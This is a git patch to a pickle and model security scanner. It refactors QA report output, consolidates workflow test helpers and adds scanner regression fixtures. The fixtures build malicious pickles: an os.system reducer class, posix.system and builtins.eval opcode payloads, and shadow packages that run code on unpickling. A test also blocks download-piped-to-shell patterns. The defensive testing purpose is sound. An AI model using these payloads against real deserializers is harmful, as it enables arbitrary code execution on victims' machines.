_validated_remote_path(entry["path"])) remote_size = entry.get("remote_size_bytes") if ( budget_bytes is not None @@ -1378,7 +1321,7 @@ def cmd_download(args: argparse.Namespace) -> int: lock_path, updated, tier=str(lock_payload.get("tier", "custom")), - extra=_lock_extra_metadata(lock_payload), + extra={str(key): value for key, value in lock_payload.items() if key not in LOCK_CORE_KEYS}, ) print(f"Updated {lock_path}; downloaded {downloaded_bytes} bytes") return 1 if download_failed else 0 @@ -1394,7 +1337,7 @@ def cmd_classify(args: argparse.Namespace) -> int: lock_path, entries, tier=str(lock_payload.get("tier", "custom")), - extra=_lock_extra_metadata(lock_payload), + extra={str(key): value for key, value in lock_payload.items() if key not in LOCK_CORE_KEYS}, ) print(f"Classified {len(entries)} entries in {lock_path}") return 0 @@ -1575,15 +1518,7 @@ def cmd_scan(args: argparse.Namespace) -> int: finally: logging.disable(previous_logging_disable_level) - _write_json(run_dir / "parity-drift.json", _build_parity_drift(all_scan_rows)) - _write_json( - run_dir / "third-party-differential.json", - _build_third_party_differential(all_third_party_rows, scan_rows=all_scan_rows), - ) - _write_json(run_dir / "coverage-matrix.json", _build_coverage_matrix(all_scan_rows)) - _write_json(run_dir / "benchmark-results.json", _build_benchmark_results(all_scan_rows, all_third_party_rows)) - _write_benchmark_csv(run_dir / "benchmark-summary.csv", all_scan_rows, all_third_party_rows) - _write_report(run_dir, all_scan_rows, all_third_party_rows) + _write_qa_outputs(run_dir, all_scan_rows, all_third_party_rows) print(f"Wrote QA run to {run_dir}") scan_error_count = sum(1 for row in all_scan_rows if _scan_row_has_error(row)) if scan_error_count: @@ -1602,17 +1537,6 @@ def _scan_row_has_error(row: Mapping[str, Any]) -> bool: return isinstance(result, Mapping) and result.get("status") == "error" -def _rows_by_artifact_and_scanner(rows: Iterable[Mapping[str, Any]]) -> dict[tuple[str, str], dict[str, Any]]: - indexed: dict[tuple[str, str], dict[str, Any]] = {} - for row in rows: - result = row.get("result") - if not isinstance(result, Mapping): - continue - key = (str(row.get("artifact_id")), f"{row.get('scanner')}:{row.get('mode')}") - indexed[key] = dict(row) - return indexed - - def _result_rank(result: Mapping[str, Any]) -> int: verdict = result.get("verdict") return {"clean": 0, "suspicious": 1, "malicious": 2, "unknown": -1}.get(str(verdict), -1) @@ -1884,7 +1808,7 @@ def _write_report( lines = [ "# PickleScan Rust Large-Corpus QA Report", "", - f"Generated: {_now_iso()}", + f"Generated: {datetime.now(timezone.utc).isoformat().replace('+00:00', 'Z')}", "", "## Summary", "", @@ -1894,38 +1818,31 @@ def _write_report( f"- Third-party failure count: {third_party['failure_count']}", f"- Coverage missing: {', '.join(coverage['missing']) if coverage['missing'] else 'none'}", "", - "## Parity Drift", - "", - "```json", - json.dumps(drift, indent=2, sort_keys=True, default=_json_default), - "```", - "", - "## Third-Party Differential", - "", - "```json", - json.dumps(third_party, indent=2, sort_keys=True, default=_json_default), - "```", - "", - "## Coverage Matrix", - "", - "```json", - json.dumps(coverage, indent=2, sort_keys=True, default=_json_default), - "```", - "", - "## Benchmark Summary", - "", - "```json", - json.dumps(benchmark, indent=2, sort_keys=True, default=_json_default), - "```", - "", ] + for title, payload in ( + ("Parity Drift", drift), + ("Third-Party Differential", third_party), + ("Coverage Matrix", coverage), + ("Benchmark Summary", benchmark), + ): + lines.extend( + [ + f"## {title}", + "", + "```json", + json.dumps(payload, indent=2, sort_keys=True, default=_json_default), + "```", + "", + ] + ) (run_dir / "qa-report.md").write_text("\n".join(lines), encoding="utf-8") -def cmd_report(args: argparse.Namespace) -> int: - run_dir = Path(args.run) - scan_rows = _read_jsonl(run_dir / "scan-results.jsonl") - third_party_rows = _read_jsonl(run_dir / "third-party-results.jsonl") +def _write_qa_outputs( + run_dir: Path, + scan_rows: Sequence[Mapping[str, Any]], + third_party_rows: Sequence[Mapping[str, Any]], +) -> None: _write_json(run_dir / "parity-drift.json", _build_parity_drift(scan_rows)) _write_json( run_dir / "third-party-differential.json", @@ -1935,6 +1852,13 @@ def cmd_report(args: argparse.Namespace) -> int: _write_json(run_dir / "benchmark-results.json", _build_benchmark_results(scan_rows, third_party_rows)) _write_benchmark_csv(run_dir / "benchmark-summary.csv", scan_rows, third_party_rows) _write_report(run_dir, scan_rows, third_party_rows) + + +def cmd_report(args: argparse.Namespace) -> int: + run_dir = Path(args.run) + scan_rows = _read_jsonl(run_dir / "scan-results.jsonl") + third_party_rows = _read_jsonl(run_dir / "third-party-results.jsonl") + _write_qa_outputs(run_dir, scan_rows, third_party_rows) print(f"Wrote report files in {run_dir}") return 0 diff --git a/tests/__init__.py b/tests/__init__.py index 825361d76..d2b09fd37 100644 --- a/tests/__init__.py +++ b/tests/__init__.py @@ -1 +1,5 @@ # This file makes tests a package + +import pytest + +pytest.register_assert_rewrite("tests.helpers") diff --git a/tests/helpers/workflows.py b/tests/helpers/workflows.py new file mode 100644 index 000000000..ad38ece36 --- /dev/null +++ b/tests/helpers/workflows.py @@ -0,0 +1,23 @@ +"""Shared accessors for parsed workflow contract tests.""" + +from typing import Any, cast + + +def _workflow_triggers(workflow: dict[str, Any]) -> dict[str, Any]: + raw_workflow = cast(dict[Any, Any], workflow) + triggers = raw_workflow.get("on", raw_workflow.get(True)) + assert isinstance(triggers, dict) + return triggers + + +def _step_by_name(steps: list[dict[str, Any]], name: str) -> dict[str, Any]: + for step in steps: + if step.get("name") == name: + return step + raise AssertionError(f"Step {name!r} not found") + + +def _jobs(workflow: dict[str, Any]) -> dict[str, Any]: + jobs = workflow["jobs"] + assert isinstance(jobs, dict) + return jobs diff --git a/tests/test_docker_workflow.py b/tests/test_docker_workflow.py index 335f71375..b3e17d51c 100644 --- a/tests/test_docker_workflow.py +++ b/tests/test_docker_workflow.py @@ -4,11 +4,13 @@ import subprocess import sys from pathlib import Path -from typing import Any, cast +from typing import Any import pytest import yaml +from tests.helpers.workflows import _jobs, _step_by_name, _workflow_triggers + _REPO_ROOT = Path(__file__).resolve().parents[1] _PINNED_PYTHON_IMAGE_RE = re.compile(r"^python:(?P\d+\.\d+-slim)@sha256:(?P[0-9a-f]{64})$") _SHA256_RE = re.compile(r"^[0-9a-f]{64}$") @@ -28,13 +30,6 @@ def _load_docker_publish_workflow() -> dict[str, Any]: return workflow -def _workflow_triggers(workflow: dict[str, Any]) -> dict[str, Any]: - raw_workflow = cast(dict[Any, Any], workflow) - triggers = raw_workflow.get("on", raw_workflow.get(True)) - assert isinstance(triggers, dict) - return triggers - - def _run_tag_validator(tag: str) -> subprocess.CompletedProcess[str]: return subprocess.run( [sys.executable, str(_REPO_ROOT / "scripts" / "validate_docker_publish_tag.py"), tag], @@ -45,7 +40,14 @@ def _run_tag_validator(tag: str) -> subprocess.CompletedProcess[str]: def _dockerfile_lines(path: str) -> list[str]: - return (_REPO_ROOT / path).read_text(encoding="utf-8").splitlines() + content = (_REPO_ROOT / path).read_text(encoding="utf-8") + source_command = " && . ./docker-install-rust.sh \\" + if source_command in content: + copy_command = "COPY . ." if path == "Dockerfile.full" else "COPY docker-install-rust.sh ./" + assert content.index(copy_command) < content.index(source_command) + installer = (_REPO_ROOT / "docker-install-rust.sh").read_text(encoding="utf-8") + content = content.replace(source_command, installer) + return content.splitlines() def _python_image_from_arg(path: str) -> str: @@ -67,12 +69,6 @@ def _assert_pinned_python_image(image: str, expected_version: str) -> None: assert match.group("version") == expected_version -def _jobs(workflow: dict[str, Any]) -> dict[str, Any]: - jobs = workflow["jobs"] - assert isinstance(jobs, dict) - return jobs - - def _job_steps(workflow: dict[str, Any], job_name: str) -> list[dict[str, Any]]: job = _jobs(workflow)[job_name] assert isinstance(job, dict) @@ -81,13 +77,6 @@ def _job_steps(workflow: dict[str, Any], job_name: str) -> list[dict[str, Any]]: return steps -def _step_by_name(steps: list[dict[str, Any]], name: str) -> dict[str, Any]: - for step in steps: - if step.get("name") == name: - return step - raise AssertionError(f"Step {name!r} not found") - - def test_dockerfiles_pin_python_base_images_by_digest() -> None: lightweight_image = _python_image_from_arg("Dockerfile") full_image = _python_image_from_arg("Dockerfile.full") @@ -293,7 +282,7 @@ def test_dockerfiles_verify_pinned_rustup_init_instead_of_streaming_shell() -> N assert _SHA256_RE.fullmatch(expected_arm64_sha256) for path in ("Dockerfile", "Dockerfile.full", "Dockerfile.tensorflow"): - content = (_REPO_ROOT / path).read_text(encoding="utf-8") + content = "\n".join(_dockerfile_lines(path)) assert "https://sh.rustup.rs" not in content assert "| sh" not in content assert "sh -s --" not in content diff --git a/tests/test_perf_workflow.py b/tests/test_perf_workflow.py index 63144d82e..228753877 100644 --- a/tests/test_perf_workflow.py +++ b/tests/test_perf_workflow.py @@ -10,6 +10,8 @@ import pytest import yaml +from tests.helpers.workflows import _jobs, _step_by_name, _workflow_triggers + def _load_workflow(filename: str) -> dict[str, Any]: current_path = Path(__file__).resolve() @@ -32,19 +34,6 @@ def _load_perf_workflow() -> dict[str, Any]: return _load_workflow("perf.yml") -def _workflow_triggers(workflow: dict[str, Any]) -> dict[str, Any]: - raw_workflow = cast(dict[Any, Any], workflow) - triggers = raw_workflow.get("on", raw_workflow.get(True)) - assert isinstance(triggers, dict) - return triggers - - -def _jobs(workflow: dict[str, Any]) -> dict[str, Any]: - jobs = workflow["jobs"] - assert isinstance(jobs, dict) - return jobs - - def _benchmarks_job(workflow: dict[str, Any]) -> dict[str, Any]: job = _jobs(workflow)["benchmarks"] assert isinstance(job, dict) @@ -57,13 +46,6 @@ def _job_steps(workflow: dict[str, Any]) -> list[dict[str, Any]]: return steps -def _step_by_name(steps: list[dict[str, Any]], name: str) -> dict[str, Any]: - for step in steps: - if step.get("name") == name: - return step - raise AssertionError(f"Step {name!r} not found") - - def _node_script(step: dict[str, Any]) -> str: run = step["run"] assert isinstance(run, str) diff --git a/tests/test_release_workflow.py b/tests/test_release_workflow.py index 2374a832d..848dbf556 100644 --- a/tests/test_release_workflow.py +++ b/tests/test_release_workflow.py @@ -16,12 +16,14 @@ import zlib from collections.abc import Iterator from pathlib import Path -from typing import Any, cast +from typing import Any import pytest import yaml from packaging.requirements import Requirement +from tests.helpers.workflows import _jobs, _step_by_name, _workflow_triggers + try: import tomllib except ModuleNotFoundError: # pragma: no cover - Python 3.10 compatibility @@ -47,13 +49,6 @@ def _load_release_workflow() -> dict[str, Any]: return workflow -def _workflow_triggers(workflow: dict[str, Any]) -> dict[str, Any]: - raw_workflow = cast(dict[Any, Any], workflow) - triggers = raw_workflow.get("on", raw_workflow.get(True)) - assert isinstance(triggers, dict) - return triggers - - def _job_steps(workflow: dict[str, Any], job_name: str) -> list[dict[str, Any]]: jobs = workflow["jobs"] assert isinstance(jobs, dict) @@ -64,19 +59,6 @@ def _job_steps(workflow: dict[str, Any], job_name: str) -> list[dict[str, Any]]: return steps -def _step_by_name(steps: list[dict[str, Any]], name: str) -> dict[str, Any]: - for step in steps: - if step.get("name") == name: - return step - raise AssertionError(f"Step {name!r} not found") - - -def _jobs(workflow: dict[str, Any]) -> dict[str, Any]: - jobs = workflow["jobs"] - assert isinstance(jobs, dict) - return jobs - - def _run_manual_release_step( *, root_version: str, @@ -623,6 +605,7 @@ def test_release_workflow_verifies_published_picklescan_package() -> None: steps = _job_steps(workflow, "verify-picklescan-pypi") wait_step = _step_by_name(steps, "Wait for modelaudit-picklescan files on PyPI") + assert wait_step["env"] == {"PYPI_PROJECT": "modelaudit-picklescan"} wait_run = wait_step["run"] assert "https://pypi.org/pypi/modelaudit-picklescan/{version}/json" in wait_run assert "https://pypi.org/simple/modelaudit-picklescan/" in wait_run @@ -730,6 +713,7 @@ def fake_urlopen(url: str | urllib.request.Request, timeout: int = 20) -> io.Byt ticks = iter((0.0, 1.0, 2.0, 3.0)) monkeypatch.setenv("EXPECTED_VERSION", version) + monkeypatch.setenv("PYPI_PROJECT", project) monkeypatch.setattr(urllib.request, "urlopen", fake_urlopen) monkeypatch.setattr(time, "monotonic", lambda: next(ticks, 3.0)) monkeypatch.setattr(time, "sleep", lambda _seconds: None) @@ -879,6 +863,7 @@ def test_release_workflow_verifies_published_root_package_after_picklescan() -> steps = _job_steps(workflow, "verify-pypi") wait_step = _step_by_name(steps, "Wait for modelaudit files on PyPI") + assert wait_step["env"] == {"PYPI_PROJECT": "modelaudit"} wait_run = wait_step["run"] assert "https://pypi.org/pypi/modelaudit/{version}/json" in wait_run assert "https://pypi.org/simple/modelaudit/" in wait_run From 6649a9644cbc81e1b8ab235094b2c7ea7c9b0166 Mon Sep 17 00:00:00 2001 From: Michael D'Angelo Date: Sat, 3 Oct 2026 01:15:11 +0000 Subject: [PATCH 02/24] test: consolidate fixtures and regression harnesses --- .../tests/framework_fixtures.py | 527 ++ .../tests/parity_corpus.py | 12 +- .../tests/pickle_test_helpers.py | 72 + .../tests/test_adversarial_pickle_oracle.py | 978 ++-- .../modelaudit-picklescan/tests/test_api.py | 4417 ++++++----------- .../test_call_graph_assignment_alias_cycle.py | 344 +- .../tests/test_call_graph_click.py | 46 +- .../tests/test_call_graph_execnet.py | 46 +- .../test_call_graph_import_statements.py | 1869 ++----- .../test_call_graph_instance_defaults.py | 87 +- .../tests/test_call_graph_local_imports.py | 52 +- .../test_call_graph_safe_spec_resolution.py | 124 +- .../tests/test_call_graph_six.py | 71 +- .../tests/test_call_graph_tkinter.py | 50 +- .../tests/test_known_size_streams.py | 19 +- .../tests/test_nested_budget_limits.py | 9 +- .../tests/test_protocol0_line_operands.py | 49 +- .../tests/test_rust_engine.py | 9 +- tests/analysis/test_analysis_modules.py | 111 +- tests/analysis/test_anomaly_detector.py | 250 +- tests/analysis/test_entropy_analyzer.py | 40 +- tests/analysis/test_framework_patterns.py | 46 +- .../benchmarks/test_picklescan_benchmarks.py | 9 +- tests/benchmarks/test_scan_benchmarks.py | 31 +- tests/cache/test_cache_correctness.py | 368 +- tests/conftest.py | 12 +- tests/detectors/test_compile_eval_variants.py | 103 +- tests/detectors/test_cve_detection.py | 30 +- tests/detectors/test_jit_script_detector.py | 2465 +++------ tests/detectors/test_network_comm_detector.py | 733 +-- tests/detectors/test_secrets_detector.py | 48 +- tests/helpers/assertions.py | 11 + tests/helpers/cache.py | 73 + tests/helpers/file_creators.py | 374 +- tests/helpers/frameworks.py | 23 +- tests/helpers/http.py | 24 + tests/helpers/pickle_framework.py | 112 + tests/helpers/processes.py | 9 + tests/helpers/scanners.py | 158 + tests/helpers/tensorflow.py | 48 + tests/helpers/text.py | 14 + tests/integrations/test_jfrog.py | 374 +- .../test_jfrog_redirect_security.py | 144 +- tests/integrations/test_mlflow_integration.py | 33 +- tests/scanners/test_base_scanner.py | 33 +- tests/scanners/test_cntk_scanner.py | 5 +- tests/scanners/test_compressed_scanner.py | 6 +- tests/scanners/test_coreml_scanner.py | 20 +- tests/scanners/test_evidence_redaction.py | 268 +- tests/scanners/test_executorch_scanner.py | 156 +- tests/scanners/test_flax_msgpack_scanner.py | 157 +- tests/scanners/test_gguf_scanner.py | 173 +- tests/scanners/test_jax_checkpoint_scanner.py | 238 +- .../scanners/test_jinja2_template_scanner.py | 1018 ++-- tests/scanners/test_joblib_scanner.py | 12 +- tests/scanners/test_joblib_scanner_codecs.py | 54 +- tests/scanners/test_keras_h5_scanner.py | 308 +- tests/scanners/test_keras_utils.py | 14 +- tests/scanners/test_keras_zip_scanner.py | 636 +-- tests/scanners/test_lightgbm_scanner.py | 12 +- tests/scanners/test_llamafile_scanner.py | 142 +- tests/scanners/test_manifest_scanner.py | 152 +- tests/scanners/test_metadata_scanner.py | 55 +- tests/scanners/test_nemo_scanner.py | 421 +- tests/scanners/test_numpy_scanner.py | 30 +- tests/scanners/test_oci_layer_scanner.py | 379 +- tests/scanners/test_onnx_scanner.py | 615 +-- tests/scanners/test_openvino_scanner.py | 76 +- tests/scanners/test_paddle_scanner.py | 6 +- tests/scanners/test_pickle_scanner.py | 146 +- tests/scanners/test_picklescan_adapter.py | 173 +- tests/scanners/test_pmml_scanner.py | 226 +- tests/scanners/test_pytorch_binary_scanner.py | 91 +- tests/scanners/test_pytorch_zip_scanner.py | 3426 ++++--------- tests/scanners/test_r_serialized_scanner.py | 97 +- tests/scanners/test_rknn_scanner.py | 5 +- tests/scanners/test_safetensors_scanner.py | 171 +- tests/scanners/test_scanner_registry.py | 80 +- tests/scanners/test_sevenzip_scanner.py | 616 +-- tests/scanners/test_skops_content_analysis.py | 85 +- tests/scanners/test_skops_scanner.py | 363 +- tests/scanners/test_tar_scanner.py | 849 ++-- tests/scanners/test_tensorrt_scanner.py | 53 +- tests/scanners/test_text_scanner.py | 2220 +++------ tests/scanners/test_tf_metagraph_scanner.py | 41 +- tests/scanners/test_tf_savedmodel_scanner.py | 119 +- tests/scanners/test_tflite_scanner.py | 40 +- tests/scanners/test_torch7_scanner.py | 146 +- tests/scanners/test_torchserve_mar_scanner.py | 1180 ++--- .../test_weight_distribution_scanner.py | 301 +- tests/scanners/test_xgboost_scanner.py | 96 +- tests/scanners/test_zip_scanner.py | 2474 +++------ tests/test_auth_config.py | 95 +- tests/test_cache_cli.py | 29 +- tests/test_cli.py | 485 +- tests/test_cloud_url_detection.py | 35 +- tests/test_core.py | 1349 ++--- tests/test_core_asset_extraction.py | 17 +- tests/test_cve_2025_10155_bin_pickle.py | 28 +- tests/test_dill_joblib_enhanced.py | 97 +- tests/test_directory_file_filtering.py | 266 +- tests/test_false_positive_fixes.py | 9 +- tests/test_huggingface_extensions.py | 25 +- tests/test_lazy_loading.py | 15 +- tests/test_nightly_prerequisites.py | 8 +- tests/test_os_subprocess_detection.py | 73 +- tests/test_pickle_context_filtering.py | 10 +- tests/test_pytorch_zip_detection.py | 26 +- tests/test_regular_scan_hash.py | 91 +- tests/test_scanner_selection.py | 7 +- tests/test_streaming_scan.py | 328 +- tests/test_telemetry.py | 106 +- tests/test_tensorflow_lambda_detection.py | 13 +- tests/test_weak_hash_detection.py | 95 +- tests/test_why_explanations.py | 8 +- .../utils/file/test_advanced_file_handler.py | 79 +- tests/utils/file/test_file_filter.py | 90 +- tests/utils/file/test_filetype.py | 321 +- tests/utils/file/test_streaming_analysis.py | 46 +- tests/utils/helpers/test_secure_hasher.py | 50 +- tests/utils/sources/test_cloud_storage.py | 164 +- tests/utils/sources/test_dvc_integration.py | 151 +- tests/utils/sources/test_huggingface.py | 636 +-- tests/utils/test_result_conversion.py | 32 +- 124 files changed, 12728 insertions(+), 24464 deletions(-) create mode 100644 packages/modelaudit-picklescan/tests/framework_fixtures.py create mode 100644 packages/modelaudit-picklescan/tests/pickle_test_helpers.py create mode 100644 tests/helpers/assertions.py create mode 100644 tests/helpers/cache.py create mode 100644 tests/helpers/http.py create mode 100644 tests/helpers/pickle_framework.py create mode 100644 tests/helpers/processes.py create mode 100644 tests/helpers/scanners.py create mode 100644 tests/helpers/tensorflow.py create mode 100644 tests/helpers/text.py diff --git a/packages/modelaudit-picklescan/tests/framework_fixtures.py b/packages/modelaudit-picklescan/tests/framework_fixtures.py new file mode 100644 index 000000000..9462dfeb8 --- /dev/null +++ b/packages/modelaudit-picklescan/tests/framework_fixtures.py @@ -0,0 +1,527 @@ +"""Framework package fixtures shared with root adapter regressions.""" + +import os +import subprocess +import sys +from collections.abc import Callable +from importlib import metadata as importlib_metadata +from pathlib import Path +from typing import TYPE_CHECKING, Any + +if TYPE_CHECKING: + import pytest + + +def _assert_shadow_framework_unpickle_executes( + payload_path: Path, + tmp_path: Path, + *, + mode: str, + extension_code: int | None, +) -> None: + marker = tmp_path / f"{payload_path.stem}.marker" + package_root = tmp_path / f"{payload_path.stem}.shadow" + _write_shadow_transformers_package(package_root, marker) + code_arg = "none" if extension_code is None else str(extension_code) + script = ( + "import copyreg, io, pickle, sys\n" + "from pathlib import Path\n" + "payload = Path(sys.argv[1]).read_bytes()\n" + "mode = sys.argv[2]\n" + "code_arg = sys.argv[3]\n" + "if code_arg != 'none':\n" + " copyreg.add_extension('transformers.training_args', 'TrainingArguments', int(code_arg))\n" + "if mode == 'nested':\n" + " pickle.loads(pickle.loads(payload))\n" + "elif mode == 'concatenated':\n" + " stream = io.BytesIO(payload)\n" + " while stream.tell() < len(payload):\n" + " pickle.load(stream)\n" + "else:\n" + " pickle.loads(payload)\n" + ) + completed = subprocess.run( + [sys.executable, "-c", script, str(payload_path), mode, code_arg], + check=False, + env={**os.environ, "PYTHONPATH": str(package_root)}, + capture_output=True, + text=True, + ) + assert completed.returncode == 0, (completed.returncode, completed.stderr) + assert marker.exists(), f"Missing execution marker: {marker}" + + +def _write_shadow_transformers_package(package_root: Path, marker: Path) -> None: + package_dir = package_root / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + "from pathlib import Path", + f"_MARKER = Path({str(marker)!r})", + "class TrainingArguments:", + " __slots__ = ('payload',)", + " def __new__(cls, *args, **kwargs):", + " return object.__new__(cls)", + " def __setstate__(self, state):", + " _MARKER.write_text('setstate', encoding='utf-8')", + " def __setattr__(self, name, value):", + " _MARKER.write_text(f'setattr:{name}', encoding='utf-8')", + " object.__setattr__(self, name, value)", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_init_heavy_trusted_transformers_package(site_packages: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + "HELPER = object()", + "class TrainingArguments:", + " def __new__(cls):", + " return object.__new__(cls)", + " def __init__(self):", + " self.helper = HELPER", + " def __setstate__(self, state):", + " self.__dict__.update(state)", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_sitecustomize_trusting_site_packages(customize_dir: Path, site_packages: Path) -> None: + customize_dir.mkdir(parents=True, exist_ok=True) + (customize_dir / "sitecustomize.py").write_text( + "\n".join( + [ + "import sysconfig", + f"_TRUSTED_SITE_PACKAGES = {str(site_packages)!r}", + "_ORIGINAL_GET_PATH = sysconfig.get_path", + "def _patched_get_path(name, scheme=None, vars=None, expand=True):", + " if name in {'purelib', 'platlib'}:", + " return _TRUSTED_SITE_PACKAGES", + " if scheme is None and vars is None and expand is True:", + " return _ORIGINAL_GET_PATH(name)", + " return _ORIGINAL_GET_PATH(name, scheme=scheme, vars=vars, expand=expand)", + "sysconfig.get_path = _patched_get_path", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_init_inert_setstate_transformers_package(site_packages: Path, marker: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + f"MARKER = {str(marker)!r}", + "class TrainingArguments:", + " def __new__(cls, *args, **kwargs):", + " return object.__new__(cls)", + " def __setstate__(self, state):", + " with open(MARKER, 'w', encoding='utf-8') as handle:", + " handle.write('setstate')", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_rebindable_trusted_transformers_package(site_packages: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + "class TrainingArguments:", + " def __new__(cls):", + " return object.__new__(cls)", + "", + "class OptimizerNames:", + " def __new__(cls, value=''):", + " return object.__new__(cls)", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_import_side_effect_transformers_package(site_packages: Path, marker: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + f"MARKER = {str(marker)!r}", + "with open(MARKER, 'w', encoding='utf-8') as handle:", + " handle.write('import')", + "class OptimizerNames:", + " pass", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_runtime_mutable_trusted_transformers_package(site_packages: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "training_args.py").write_text( + "\n".join( + [ + "def OptimizerNames(value, callback=None):", + " if callback is not None:", + " return callback(value)", + " return None", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_enum_trusted_transformers_package(site_packages: Path) -> None: + package_dir = site_packages / "transformers" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "trainer_utils.py").write_text( + "\n".join( + [ + "from enum import Enum", + "class IntervalStrategy(str, Enum):", + " STEPS = 'steps'", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_rebindable_trusted_torch_utils_package(site_packages: Path) -> None: + package_dir = site_packages / "torch" + package_dir.mkdir(parents=True, exist_ok=True) + (package_dir / "__init__.py").write_text("", encoding="utf-8") + (package_dir / "_utils.py").write_text( + "\n".join( + [ + "def _rebuild_tensor(arg):", + " return None", + "", + ] + ), + encoding="utf-8", + ) + + +def _write_cross_module_rebind_target_package(site_packages: Path) -> None: + (site_packages / "trusted_target.py").write_text( + "\n".join( + [ + "from pathlib import Path", + "def rebound_optimizer(path):", + " Path(path).write_text('cross-module', encoding='utf-8')", + " return None", + "", + ] + ), + encoding="utf-8", + ) + + +class SystemCommandPayload: + """Serializable shell-command reducer for malicious scanner regression fixtures.""" + + def __init__(self, command: str, system_getter: Callable[[], Any] | None = None) -> None: + self.command = command + self.system_getter = system_getter + + def __reduce__(self) -> tuple[Any, tuple[str]]: + # Preserve reducer-time imports or the caller's deferred module lookup. + if self.system_getter is None: + import os + + system = os.system + else: + system = self.system_getter() + return (system, (self.command,)) + + +_SHADOW_FRAMEWORK_MODULE = "transformers.training_args" +_SHADOW_FRAMEWORK_NAME = "TrainingArguments" + + +def _pickle_binint(value: int) -> bytes: + if 0 <= value <= 0xFF: + return b"K" + bytes([value]) + return b"J" + value.to_bytes(4, "little", signed=True) + + +def _float_storage_element_count_for_bytes(data: bytes) -> int: + assert len(data) % 4 == 0, f"Unaligned float storage length: {len(data)}" + return len(data) // 4 + + +def _pickle_int_tuple(values: tuple[int, ...]) -> bytes: + payload = b"".join(_pickle_binint(value) for value in values) + if len(values) == 0: + return b")" + if len(values) == 1: + return payload + b"\x85" + if len(values) == 2: + return payload + b"\x86" + if len(values) == 3: + return payload + b"\x87" + return b"(" + payload + b"t" + + +def _force_framework_metadata_unresolved(monkeypatch: "pytest.MonkeyPatch") -> None: + monkeypatch.setattr( + "modelaudit_picklescan.call_graph._trusted_module_origin_kind", + lambda _module_name: "unresolved", + ) + monkeypatch.setattr("modelaudit_picklescan.call_graph._resolve_module_source", lambda _module_name: None) + monkeypatch.setattr( + "modelaudit_picklescan.call_graph._find_module_spec_without_imports", + lambda _module_name: None, + ) + + +def _shadow_newobj_build_payload(protocol: int = 4) -> bytes: + return _stack_global_reference_payload(protocol) + b")\x81}b." + + +def _shadow_memo_alias_payload() -> bytes: + return _stack_global_reference_payload(4) + b"\x94" + b"0" + b"h\x02)\x81}b." + + +def _shadow_newobj_ex_payload() -> bytes: + return _stack_global_reference_payload(4) + b")}\x92}b." + + +def _bytes_literal_payload(payload: bytes) -> bytes: + return b"\x80\x04B" + len(payload).to_bytes(4, "little") + payload + b"." + + +def _extension_reconstruction_payload(opcode: bytes, encoded_code: bytes) -> bytes: + return b"\x80\x04" + opcode + encoded_code + b")\x81}b." + + +def _shadow_framework_divergence_cases() -> tuple[object, ...]: + import pytest + + nested = _shadow_newobj_build_payload(4) + return ( + pytest.param("protocol4_stack_global", _shadow_newobj_build_payload(4), "single", None, id="protocol4"), + pytest.param("protocol5_stack_global", _shadow_newobj_build_payload(5), "single", None, id="protocol5"), + pytest.param("memo_alias", _shadow_memo_alias_payload(), "single", None, id="memo-alias"), + pytest.param("newobj_ex", _shadow_newobj_ex_payload(), "single", None, id="newobj-ex"), + pytest.param("slot_state_build", _shadow_slot_state_build_payload(), "single", None, id="slot-state-build"), + pytest.param("nested_stream", _bytes_literal_payload(nested), "nested", None, id="nested"), + pytest.param("concatenated_stream", b"\x80\x04N." + nested, "concatenated", None, id="concatenated"), + pytest.param("ext1_control", _extension_reconstruction_payload(b"\x82", b"\x01"), "single", 1, id="ext1"), + pytest.param( + "ext2_control", + _extension_reconstruction_payload(b"\x83", (256).to_bytes(2, "little")), + "single", + 256, + id="ext2", + ), + pytest.param( + "ext4_control", + _extension_reconstruction_payload(b"\x84", (70_000).to_bytes(4, "little")), + "single", + 70_000, + id="ext4", + ), + ) + + +def _large_proto0_system_payload() -> bytes: + return b"cposix\nsystem\n(S'" + (b"A" * 10_000) + b"'\ntR." + + +def _frame_first_large_malicious_eval_pickle_payload() -> bytes: + benign_prefix = b"N0" * 2100 + dangerous_suffix = b"cbuiltins\neval\n(S'print(1)'\ntR." + body = benign_prefix + dangerous_suffix + payload = b"\x95" + len(body).to_bytes(8, "little") + body + assert payload[0] == 0x95, "Payload must start with FRAME" + assert int.from_bytes(payload[1:9], "little") > 4 * 1024, "Frame must exceed the probe window" + assert payload.find(b"cbuiltins\neval\n") > 4 * 1024, "Eval must follow the probe window" + assert payload.rfind(b".") > 4 * 1024, "STOP must follow the probe window" + return payload + + +def _frame_first_raw_storage_bytes() -> bytes: + return b"\x95" + (10_000).to_bytes(8, "little") + (b"\x00" * 4095) + + +def _pytorch_storage_protocol0_persistent_id_payload( + key: str, + *, + storage_qualname: str = "torch.FloatStorage", + size: int | str = 1, +) -> bytes: + return f"(dp0\nVx\np1\nP('storage', , '{key}', 'cpu', {size})\ns.".encode("ascii") + + +def _pytorch_storage_then_arbitrary_protocol0_persistent_id_payload(key: str) -> bytes: + payload = _pytorch_storage_protocol0_persistent_id_payload(key) + assert payload.endswith(b"."), "Persistent storage payload must end with STOP" + 